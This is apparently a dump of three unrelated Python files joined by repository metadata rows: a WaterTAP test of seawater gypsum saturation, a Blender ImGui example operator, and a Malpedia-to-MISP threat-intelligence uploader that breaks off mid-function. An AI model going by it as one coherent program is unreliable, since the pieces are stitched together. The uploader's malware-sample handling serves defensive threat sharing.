from idaes.core.util import get_solver
from watertap.examples.flowsheets.full_treatment_train.model_components.eNRTL import (
entrl_config_FTPx,
entrl_config_FpcTP,
)
from watertap.examples.flowsheets.full_treatment_train.util import (
check_scaling,
solve_block,
)
def simulate_enrtl_FTPx(state_var_args):
m = ConcreteModel()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.params = GenericParameterBlock(default=entrl_config_FTPx.configuration)
m.fs.state = m.fs.params.build_state_block(
m.fs.time, default={"defined_state": True}
)
for (v_name, ind), val in state_var_args.items():
var = getattr(m.fs.state[0], v_name)
var[ind].fix(val)
m.fs.state[0].flow_mol_phase["Liq"].value = 1
# scale model
calculate_scaling_factors(m)
# Regular solve
solver = get_solver()
results = solver.solve(m)
ksp = 3.2e-9 # Gibbs energy gives 3.9e-8, but this fits expectations better
saturation_index = value(
m.fs.state[0].act_phase_comp["Liq", "Ca_2+"]
* m.fs.state[0].act_phase_comp["Liq", "SO4_2-"]
* m.fs.state[0].act_phase_comp["Liq", "H2O"] ** 2
/ ksp
)
return saturation_index
@pytest.mark.component
def test_enrtl_FTPx_0():
# seawater concentration
state_var_args = {
("temperature", None): 298,
("pressure", None): 101325,
("flow_mol", None): 100,
("mole_frac_comp", "Na_+"): 0.008845,
("mole_frac_comp", "Ca_2+"): 0.000174,
("mole_frac_comp", "Mg_2+"): 0.001049,
("mole_frac_comp", "SO4_2-"): 0.000407,
("mole_frac_comp", "Cl_-"): 0.010479,
("mole_frac_comp", "H2O"): 0.979046,
}
saturation_index = simulate_enrtl_FTPx(state_var_args)
assert saturation_index == pytest.approx(0.2198, rel=1e-3)
@pytest.mark.component
def test_enrtl_FTPx_1():
# 2 times seawater concentration
state_var_args = {
("temperature", None): 298,
("pressure", None): 101325,
("flow_mol", None): 100,
("mole_frac_comp", "Na_+"): 0.017327,
("mole_frac_comp", "Ca_2+"): 0.000341,
("mole_frac_comp", "Mg_2+"): 0.002054,
("mole_frac_comp", "SO4_2-"): 0.000796,
("mole_frac_comp", "Cl_-"): 0.020529,
("mole_frac_comp", "H2O"): 0.958952,
}
saturation_index = simulate_enrtl_FTPx(state_var_args)
assert saturation_index == pytest.approx(0.4333, rel=1e-3)
def simulate_enrtl_FpcTP(state_var_args):
m = ConcreteModel()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.params = GenericParameterBlock(default=entrl_config_FpcTP.configuration)
m.fs.state = m.fs.params.build_state_block(
m.fs.time, default={"defined_state": True}
)
for (v_name, ind), val in state_var_args.items():
var = getattr(m.fs.state[0], v_name)
var[ind].fix(val)
# scale model
calculate_scaling_factors(m)
for (ind, c) in m.fs.state[0].true_to_appr_species.items():
sf = get_scaling_factor(m.fs.state[0].flow_mol_phase_comp_apparent[ind])
constraint_scaling_transform(c, sf)
for (ind, c) in m.fs.state[0].appr_mole_frac_constraint.items():
sf = get_scaling_factor(m.fs.state[0].mole_frac_phase_comp_apparent[ind])
constraint_scaling_transform(c, sf)
check_scaling(m)
solve_block(m)
ksp = 3.2e-9 # Gibbs energy gives 3.9e-8, but this fits expectations better
saturation_index = value(
m.fs.state[0].act_phase_comp["Liq", "Ca_2+"]
* m.fs.state[0].act_phase_comp["Liq", "SO4_2-"]
* m.fs.state[0].act_phase_comp["Liq", "H2O"] ** 2
/ ksp
)
return saturation_index
@pytest.mark.component
def test_enrtl_FpcTP_1():
# standard seawater concentration
feed_flow_mass = 1 # kg/s
feed_mass_frac_comp = {
"Na_+": 11122e-6,
"Ca_2+": 382e-6,
"Mg_2+": 1394e-6,
"SO4_2-": 2136e-6,
"Cl_-": 20316.88e-6,
}
feed_mass_frac_comp["H2O"] = 1 - sum(x for x in feed_mass_frac_comp.values())
mw_comp = {
"H2O": 18.015e-3,
"Na_+": 22.990e-3,
"Ca_2+": 40.078e-3,
"Mg_2+": 24.305e-3,
"SO4_2-": 96.06e-3,
"Cl_-": 35.453e-3,
}
feed_flow_mol_comp = {}
for j in feed_mass_frac_comp:
feed_flow_mol_comp[j] = feed_flow_mass * feed_mass_frac_comp[j] / mw_comp[j]
state_var_args = {("temperature", None): 298, ("pressure", None): 101325}
for j in feed_flow_mol_comp:
state_var_args[("flow_mol_phase_comp", ("Liq", j))] = feed_flow_mol_comp[j]
saturation_index = simulate_enrtl_FpcTP(state_var_args)
assert saturation_index == pytest.approx(0.2200, rel=1e-3)
@pytest.mark.component
def test_enrtl_FpcTP_2():
# seawater concentration with 50% water removal
feed_flow_mass = 1 # kg/s
feed_mass_frac_comp = {
"Na_+": 11122e-6,
"Ca_2+": 382e-6,
"Mg_2+": 1394e-6,
"SO4_2-": 2136e-6,
"Cl_-": 20316.88e-6,
}
feed_mass_frac_comp["H2O"] = 1 - sum(x for x in feed_mass_frac_comp.values())
mw_comp = {
"H2O": 18.015e-3,
"Na_+": 22.990e-3,
"Ca_2+": 40.078e-3,
"Mg_2+": 24.305e-3,
"SO4_2-": 96.06e-3,
"Cl_-": 35.453e-3,
}
feed_flow_mol_comp = {}
for j in feed_mass_frac_comp:
feed_flow_mol_comp[j] = feed_flow_mass * feed_mass_frac_comp[j] / mw_comp[j]
if j == "H2O":
feed_flow_mol_comp[j] = feed_flow_mol_comp[j] / 2
state_var_args = {("temperature", None): 298, ("pressure", None): 101325}
for j in feed_flow_mol_comp:
state_var_args[("flow_mol_phase_comp", ("Liq", j))] = feed_flow_mol_comp[j]
saturation_index = simulate_enrtl_FpcTP(state_var_args)
assert saturation_index == pytest.approx(0.4344, rel=1e-3)
| 33.446602
| 86
| 0.635994
|
794d978a14f5f28990ce6a168b4d71da54ad765b
| 2,708
|
py
|
Python
|
addons/BlenderImgui-main/ImguiExample/operators.py
|
V-Sekai/V-Sekai-Blender-tools
|
3473ad4abb737756290a9007273519460742960d
|
[
"MIT"
] | 2
|
2021-12-21T16:38:58.000Z
|
2022-01-08T00:56:35.000Z
|
addons/BlenderImgui-main/ImguiExample/operators.py
|
V-Sekai/V-Sekai-Blender-game-tools
|
3473ad4abb737756290a9007273519460742960d
|
[
"MIT"
] | 1
|
2022-01-29T05:46:50.000Z
|
2022-01-29T05:46:50.000Z
|
addons/BlenderImgui-main/ImguiExample/operators.py
|
V-Sekai/V-Sekai-Blender-game-tools
|
3473ad4abb737756290a9007273519460742960d
|
[
"MIT"
] | 1
|
2021-11-07T19:41:34.000Z
|
2021-11-07T19:41:34.000Z
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# Copyright (c) 2020 Elie Michel
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.types import Operator
from .blender_imgui import ImguiBasedOperator
import imgui
# -------------------------------------------------------------------
class ImguiExample(Operator,ImguiBasedOperator):
"""Example of modal operator using ImGui"""
bl_idname = "object.imgui_example"
bl_label = "Imgui Example"
def draw(self, context):
# This is where you can use any code from pyimgui's doc
# see https://pyimgui.readthedocs.io/en/latest/
imgui.begin("Your first window!", True)
imgui.text("Hello world!")
imgui.text("Another line!")
imgui.text("And yet another")
changed, self.color = imgui.color_edit3("Pick a color: Color", *self.color)
changed, self.message = imgui.input_text_multiline(
'Message:',
self.message,
2056
)
imgui.text_colored(self.message, *self.color)
imgui.end()
def invoke(self, context, event):
self.color = (1.,.5,0.)
self.message = "Type something here!"
# Call init_imgui() at the beginning
self.init_imgui(context)
context.window_manager.modal_handler_add(self)
return {'RUNNING_MODAL'}
def modal(self, context, event):
context.area.tag_redraw()
# Handle the event as you wish here, as in any modal operator
if event.type in {'RIGHTMOUSE', 'ESC'}:
# Call shutdown_imgui() any time you'll return {'CANCELLED'} or {'FINISHED'}
self.shutdown_imgui()
return {'CANCELLED'}
# Don't forget to call parent's modal:
self.modal_imgui(context, event)
return {'RUNNING_MODAL'}
# -------------------------------------------------------------------
classes = (
ImguiExample,
)
register, unregister = bpy.utils.register_classes_factory(classes)
| 34.717949
| 88
| 0.627031
|
794d979ce249133f8b03d292589247f8fa791592
| 26,009
|
py
|
Python
|
misp_event_functions.py
|
malwaredevil/malpedia_to_misp
|
4e1fc211495a68822b1b9dee88cdd19715bf4491
|
[
"MIT"
] | 3
|
2020-07-10T15:13:32.000Z
|
2021-07-22T03:29:29.000Z
|
misp_event_functions.py
|
malwaredevil/malpedia_to_misp
|
4e1fc211495a68822b1b9dee88cdd19715bf4491
|
[
"MIT"
] | 2
|
2021-01-03T01:13:37.000Z
|
2021-01-03T01:13:54.000Z
|
misp_event_functions.py
|
malwaredevil/malpedia_to_misp
|
4e1fc211495a68822b1b9dee88cdd19715bf4491
|
[
"MIT"
] | null | null | null |
import pymisp as pm
import json
from pymisp.tools import make_binary_objects
from pymisp import MISPTag
from pymisp import ExpandedPyMISP, MISPEvent, ExpandedPyMISP, MISPAttribute
from pathlib import Path
import glob
import requests
from urllib3.exceptions import ProtocolError
import globals as gv
import sys
import os
import database_actions as db
import datetime
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# import threading
import concurrent.futures as cf
from globals import _EXECUTOR as executor, _UPLOAD_EXECUTOR as uexecutor
# import time
try:
import lief # type: ignore
from lief import Logger # type: ignore
Logger.disable()
HAS_LIEF = True
# from .peobject import make_pe_objects
# from .elfobject import make_elf_objects
# from .machoobject import make_macho_objects
except ImportError:
HAS_LIEF = False
from pymisp.tools.elfobject import make_elf_objects
import pydeep # type: ignore
HAS_PYDEEP = True
# CHECK IF IS A VALID DATE
def valid_date(datestring):
try:
datetime.datetime.strptime(datestring, '%Y-%m-%d')
return True
except ValueError:
return False
def create_attribute(iCategory, iType, iValue, iIDS=1, iUUID="", iComment="", disableCorrelation=0):
retAttribute = pm.MISPAttribute()
try:
retAttribute.category=iCategory,
retAttribute.type = iType,
retAttribute.value = iValue,
retAttribute.to_ids = iIDS,
retAttribute.disable_correlation = disableCorrelation
if iUUID != "":
retAttribute.uuid = iUUID
if iComment != "":
retAttribute.comment = iComment
return retAttribute
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) create_attribute: {} {} {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
def pushToMISP(event, iUpdate=False, mURL="", mKey="", mVerifycert="", mDebug=""):
try:
mispDB = pm.ExpandedPyMISP(url=mURL, key=mKey, ssl=mVerifycert, debug=mDebug)
if gv._DEBUG:
print("f(x) pushToMISP(): PUSHING EVENT TO MISP: {}".format(event))
# NEW EVENT
if iUpdate == False:
event.publish()
event = mispDB.add_event(event, pythonify=True)
else:
event.publish()
event = mispDB.update_event(event, pythonify=True)
except Exception as e:
if gv._DEBUG:
print("f(x) pushToMISP() ERROR: {}".format(e))
pass
finally:
print("f(x) pushToMISP: CREATED MISP EVENT: {}".format(event.info))
return True
# def pushToMISPWithAttachment(event, iPath, iUpdate=False, mURL="", mKey="", mVerifycert="", mDebug="", fo=None, peo=None, seos=None):
# mispDB = ExpandedPyMISP(mURL, mKey, mVerifycert)
# # CREATE EVENT
# if iUpdate == False:
# event.publish()
# mispDB.add_event(event, pythonify=True)
# else:
# event.publish()
# mispDB.update_event(event, pythonify=True)
# p = Path(iPath)
# files = [p]
# arg_type = 'malware-sample'
# # Create attributes
# attributes = []
# for f in files:
# a = MISPAttribute()
# a.type = arg_type
# a.value = f.name
# a.data = f
# a.comment = "DATA FROM MALPEDIA."
# a.expand = 'binary'
# attributes.append(a)
# for a in attributes:
# mispDB.add_attribute(event.uuid, a)
# # # CREATE EVENT
# # if iUpdate == False:
# # event.publish()
# # mispDB.add_event(event, pythonify=True)
# # else:
# # event.publish()
# # mispDB.update_event(event, pythonify=True)
def pushToMISPWithAttachment(event, iPath, iUpdate=False, mURL="", mKey="", mVerifycert="", mDebug="", fo=None, peo=None, seos=None):
try:
mispDB = pm.ExpandedPyMISP(url=mURL, key=mKey, ssl=mVerifycert, debug=mDebug)
if gv._DEBUG:
print("f(x) pushToMISPWithAttachment() EVENT: {}".format(event))
# CREATE EVENT
if iUpdate == False:
event.publish()
mispDB.add_event(event, pythonify=True)
else:
event.publish()
mispDB.update_event(event, pythonify=True)
# # ADD ATTACHMENT
if iUpdate == False:
# myPath = iPath
# fo = None
# peo = None
# seos = None
# for f in glob.glob(myPath):
# try:
# fo , peo, seos = make_binary_objects(f)
# except Exception as e:
# continue
if seos:
try:
for s in seos:
try:
mispDB.add_object(event.uuid, s)
except Exception as e:
continue
except Exception as e:
pass
if peo:
try:
mispDB.add_object(event.uuid, peo, pythonify=True)
for ref in peo.ObjectReference:
try:
mispDB.add_object_reference(ref)
except Exception as e:
continue
except Exception as e:
pass
if fo:
try:
mispDB.add_object(event.uuid, fo)
for ref in fo.ObjectReference:
try:
mispDB.add_object_reference(ref, pythonify=True)
except Exception as e:
continue
except Exception as e:
pass
# UPDATE EVENT AFTER ADDING ATTACHMENT
try:
event.publish()
mispDB.publish(event)
print("f(x) pushToMISPWithAttachment: CREATED MISP EVENT: {}".format(event.info))
except Exception as e:
pass
except Exception as e:
if gv._DEBUG:
print("f(x) pushToMISPWithAttachment() ERROR: {}".format(e))
pass
# gv._THREAD_LIST.append(uexecutor.submit(pushToMISPWithAttachment,event, iPath, iUpdate, mURL, mKey, mVerifycert, mDebug, fo, peo, seos))
finally:
return True
# CREATES AN EVENT BASED ON UUID FOUND IN PARENT CHILD TABLE
# USES THE FOLLOWING GLOBAL VARIABLES
# ITERATE THROUGH TREE TO CREATE CHILDREN EVENTS
# _MISP_CREATE_CHILDREN = True
# ATTACH THE MALWARE, WHEN APPLICABLE. IF FALSE, ONLY METADATA (SECTIONS, SSDEEP, ETC), WILL BE PRESENT
# _MISP_ATTACH_FILES = False
def createIncident(iUUID, iUpdate=False):
try:
if gv._DEBUG:
print("f(x) createIncident: UUID: {}".format(iUUID))
# fUNCTION SETUP
# -----------------------------------------------
myUUID = iUUID
# GET UUID METADATA FROM PARENT CHILD TABLE
# -----------------------------------------------
iPC_META = db.get_parent_child_data(iUUID=myUUID)
# POSSIBLE VALUES:
# "ACTOR" : THREAT ACTOR: TOP LEVEL OF TREE.
# "FAMILY" : FAMILY (E.G. WIN.XAGENT): USUALLY MIDDLE OF TREE
# "MALWARE" : MALWARE FILE: BOTTOM OF TREE
# "PATH" : PATH (E.G. MODULES): USED WHEN IT IS NOT A FAMILY, FILE, OR ACTOR. JUST IN DISK PATH OF ACTUAL MALWARE
myType = iPC_META["mytype"]
if gv._DEBUG:
print("f(x) createIncident: TYPE: {}".format(myType))
# IF IT IS AN ACTOR
if myType == "ACTOR":
createActor(myUUID, iUpdate)
# IF IT IS A FAMILY
elif myType == "FAMILY":
createFamily(myUUID, iUpdate)
# IF IT IS MALWARE
elif myType == "MALWARE":
createMalware(iUUID, iUpdate)
# IF IT IS A PATH
elif myType == "PATH":
createPath(iUUID, iUpdate)
# CATCH EVERYTHING ELSE AND STOP PROCESS:
else:
print("f(x) createIncident: UNKNOWN TYPE")
sys.exit(0)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) createIncident: {} {} {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
# CREATE AN ACTOR [INCIDENT] IN MISP
def createActor(iUUID, iUpdate=False):
try:
# fUNCTION SETUP
# -----------------------------------------------
myUUID = iUUID
myLinks = []
myTags = []
myMeta = []
myCommonName = ""
# ATTRIBUTES COMMON FIELDS
# -----------------------------------------------
attributeToIDS = 0 # 0 false : 1 true
attributeComment = ""
attribDisableCorrelation = 1 # 0 false : 1 true
# MISP SETUP
# -----------------------------------------------
event = pm.MISPEvent()
event.uuid = myUUID
# GET META FOR ACTOR (USE COMMON NAME AS INCIDENT NAME)
myMeta = db.get_actor_meta(myUUID)
if gv._DEBUG:
print("f(x) createActor: ACTOR META")
print(json.dumps(myMeta, indent=4))
# USED AS INCIDENT NAME
myCommonName = myMeta["commonname"]
event.info = "Threat Actor: " + myCommonName
print("f(x) createActor: ACTOR NAME: {}".format(myCommonName))
# USED AS A TEXT ATTRIBUTE
myDescription = myMeta["description"]
if myDescription != "":
attributeType = "text"
attributeCategory = "Internal reference"
if gv._DEBUG:
print("f(x) createFamily: CREATING FAMILY COMMENT: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, myDescription, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, myDescription, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# -----------------------------------------------
# GET TAGS
if myCommonName != "UNATTRIBUTED" and myCommonName != "ERROR":
# GET TAGS
myTags = db.get_set_all_tags(myUUID)
event.tags = myTags
if gv._DEBUG:
print("f(x) createActor: TAGS CREATED")
print(*myTags, sep = "\n")
# REFERENCES/URLS
myLinks = db.get_links(myUUID)
for link in myLinks:
attributeType = "link"
attributeCategory = "Internal reference"
if gv._DEBUG:
print("f(x) createActor: CREATING ACTOR LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {}\nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, link["url"], attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, link["url"], comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# MARK SOURCE OF INFORMATION
attributeType = "link"
attributeCategory = "Internal reference"
attributeComment = "DATA FROM MALPEDIA."
if gv._DEBUG:
print("f(x) createActor: CREATING ACTOR ATTRIBUTION LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, gv._MALPEDIA_URL, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, gv._MALPEDIA_URL, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
gv._THREAD_LIST.append(executor.submit(pushToMISP, event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG))
# pushToMISP(event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) createActor: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
# CREATE A FAMILY [INCIDENT] IN MISP
def createFamily(iUUID, iUpdate=False ):
try:
# fUNCTION SETUP
# -----------------------------------------------
myUUID = iUUID
myLinks = []
myTags = []
myMeta = []
myCommonName = ""
# ATTRIBUTES COMMON FIELDS
# -----------------------------------------------
attributeToIDS = 0 # 0 false : 1 true
attributeComment = ""
attribDisableCorrelation = 1 # 0 false : 1 true
# MISP SETUP
# -----------------------------------------------
event = pm.MISPEvent()
event.uuid = myUUID
# GET UUID METADATA FROM PARENT CHILD TABLE
# -----------------------------------------------
iPC_META = db.get_parent_child_data(iUUID=myUUID)
parentuuid = iPC_META["parentuuid"]
event.extends_uuid = parentuuid
# -----------------------------------------------
# REFERENCES/URLS
myLinks = db.get_links(myUUID)
for link in myLinks:
attributeType = "link"
attributeCategory = "Internal reference"
if gv._DEBUG:
print("f(x) createFamily: LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {}\nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, link["url"], attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, link["url"], comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# GET TAGS
myTags = db.get_set_all_tags(myUUID)
event.tags = myTags
if gv._DEBUG:
print("f(x) createFamily: TAGS")
print(*myTags, sep = "\n")
# GET META FOR ACTOR (USE COMMON NAME AS INCIDENT NAME)
myMeta = db.get_family_meta( iUUID=myUUID)
if gv._DEBUG:
print("f(x) createFamily: META")
print(json.dumps(myMeta, indent=4))
# USED AS INCIDENT NAME
myCommonName = myMeta["commonname"]
event.info = myCommonName
print("f(x) createFamily: MALWARE NAME: {}".format(myCommonName))
# USED AS A TEXT ATTRIBUTE
myDescription = myMeta["description"]
if myDescription != "":
attributeType = "text"
attributeCategory = "Internal reference"
if gv._DEBUG:
print("f(x) createFamily: CREATING FAMILY COMMENT: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, myDescription, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, myDescription, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# MARK SOURCE OF INFORMATION
attributeType = "link"
attributeCategory = "Internal reference"
attributeComment = "DATA FROM MALPEDIA."
if gv._DEBUG:
print("f(x) createFamily: ATTRIBUTION LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, gv._MALPEDIA_URL, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, gv._MALPEDIA_URL, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# YARA
# ADD OBJECTS
# -----------------------------------------------
# YARA
iYara = db.get_yara_rules(myUUID)
tlp = ""
yaraAbsPath = ""
for yara in iYara:
tagList = []
newTag = MISPTag()
tlp = yara["tlp"]
yaraAbsPath = yara["path_to_yara"]
tlpTag = "tlp:" + tlp.split("_")[1]
newTag.name = tlpTag
tagList.append(newTag)
yaraUUID = yara["attribute_uuid"]
yaraContents = ""
with open(yaraAbsPath, 'r') as yaraIn:
yaraContents =yaraIn.read()
yaraIn.close()
misp_object = pm.tools.GenericObjectGenerator("yara")
misp_object.comment = tlpTag
misp_object.uuid = yaraUUID
subAttribute = misp_object.add_attribute("yara", yaraContents)
subAttribute.disable_correlation = True
subAttribute.to_ids = False
subAttribute.comment = tlpTag
subAttribute.tags = tagList
event.add_object(misp_object)
if gv._DEBUG:
print("f(x) createFamily: YARA")
print(*iYara, sep = "\n")
gv._THREAD_LIST.append(executor.submit(pushToMISP, event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG))
# pushToMISP(event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) createFamily: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
# CREATE A PATH [INCIDENT] IN MISP
def createPath(iUUID, iUpdate=False):
try:
# fUNCTION SETUP
# -----------------------------------------------
myUUID = iUUID
myTags = []
myName = ""
# ATTRIBUTES COMMON FIELDS
# -----------------------------------------------
attributeToIDS = 0 # 0 false : 1 true
attributeComment = ""
attribDisableCorrelation = 1 # 0 false : 1 true
# MISP SETUP
# -----------------------------------------------
event = pm.MISPEvent()
event.uuid = myUUID
# GET UUID METADATA FROM PARENT CHILD TABLE
# -----------------------------------------------
iPC_META = db.get_parent_child_data(iUUID=myUUID)
parentuuid = iPC_META["parentuuid"]
myName = iPC_META["name"]
event.extends_uuid = parentuuid
event.info = myName
print("f(x) createPath: MALWARE PATH NAME: {}".format(myName))
# GET TAGS FROM PARENT AND ADD TO THIS PATH
myTags = db.get_set_all_tags(myUUID)
event.tags = myTags
if gv._DEBUG:
print("f(x) createPath: TAGS")
print(*myTags, sep = "\n")
# MARK SOURCE OF INFORMATION
attributeType = "link"
attributeCategory = "Internal reference"
attributeComment = "DATA FROM MALPEDIA."
if gv._DEBUG:
print("f(x) createPath: ATTRIBUTION LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, gv._MALPEDIA_URL, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, gv._MALPEDIA_URL, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
gv._THREAD_LIST.append(executor.submit(pushToMISP, event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG))
# pushToMISP(event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) createPath: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
# CREATE A MALWARE [INCIDENT] IN MISP
def createMalware(iUUID, iUpdate=False):
try:
# fUNCTION SETUP
# -----------------------------------------------
myUUID = iUUID
myTags = []
# ATTRIBUTES COMMON FIELDS
# -----------------------------------------------
attributeToIDS = 0 # 0 false : 1 true
attributeComment = ""
attribDisableCorrelation = 1 # 0 false : 1 true
# MISP SETUP
# -----------------------------------------------
event = pm.MISPEvent()
event.uuid = myUUID
# GET UUID METADATA FROM PARENT CHILD TABLE
# -----------------------------------------------
iPC_META = db.get_parent_child_data(iUUID=myUUID)
parentuuid = iPC_META["parentuuid"]
event.extends_uuid = parentuuid
name = iPC_META["name"]
if name in gv._BLACKLISTED_FILES:
return True
event.info = name
print("f(x) createMalware: MALWARE SAMPLE NAME: {}".format(name))
# SET VERSION
myVersion = iPC_META["version"]
if myVersion != "":
attributeType = "text"
attributeCategory = "Internal reference"
if gv._DEBUG:
print("f(x) createMalware: CREATING FAMILY COMMENT: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, myVersion, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, myVersion, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# SET DATE ADDED
date_added = iPC_META["date_added"]
if valid_date(date_added):
event.date = date_added
else:
event.date = datetime.date.today()
# GET TAGS
myTags = db.get_set_all_tags(myUUID)
event.tags = myTags
if gv._DEBUG:
print("f(x) createMalware: TAGS")
print(*myTags, sep = "\n")
# MARK SOURCE OF INFORMATION
attributeType = "link"
attributeCategory = "Internal reference"
attributeComment = "DATA FROM MALPEDIA."
if gv._DEBUG:
print("f(x) createMalware: ATTRIBUTION LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, gv._MALPEDIA_URL, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, gv._MALPEDIA_URL, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# ADD ATTACHMENT
myPath = iPC_META["path"]
fo = None
peo = None
seos = None
# CREATE ATTACHMENT BUT DON'T UPLOAD IT AGAIN IF THIS IS JUST AN UPDATE
if iUpdate == False:
for f in glob.glob(iPC_META["path"]):
try:
fo , peo, seos = make_binary_objects(f)
except Exception as e:
continue
gv._THREAD_LIST.append(uexecutor.submit(pushToMISPWithAttachment, event, myPath, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG, fo , peo, seos))
# pushToMISPWithAttachment(event, myPath, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG, fo , peo, seos)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) createMalware: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
def uuidSearch (iUUID):
try:
retVal = 0
mispDB = pm.ExpandedPyMISP(url=gv._MISP_URL, key=gv._MISP_KEY, ssl=gv._MISP_VERIFYCERT, debug=gv._DEBUG)
kwargs = {"uuid" : iUUID}
result = mispDB.search(controller='events', return_format='json', limit=1, **kwargs)
retVal = int(len(result))
return retVal
except Exception as e:
print (e)
def deleteEvent(iUUID="", iEventID=""):
try:
mispDB = pm.ExpandedPyMISP(url=gv._MISP_URL, key=gv._MISP_KEY, ssl=gv._MISP_VERIFYCERT, debug=gv._DEBUG)
event_id = ""
if iUUID != "":
kwargs = {"uuid" : iUUID}
result = mispDB.search(controller='events', return_format='json', limit=1, **kwargs)
for val in result:
event_id = val["Event"]["id"]
elif iEventID != "":
event_id = iEventID
if event_id != "":
if gv._DEBUG:
print("f(x) deleteEvent: ATTEMPTING TO DELETE EVENT [IF EXISTS]: {}".format(event_id))
mispDB.delete_event(event_id)
else:
print("f(x) deleteEvent: EMPTY EVENT_ID FOUND. NO DELETION MADE\niUUID: {}\niEventID: {}\nRETURNED EVENT ID [IF APPLICABLE]: {}".format( iUUID, iEventID, event_id))
except Exception as e:
print (e)
def getOrgEvents(iOrgID):
try:
misp = pm.ExpandedPyMISP(gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT)
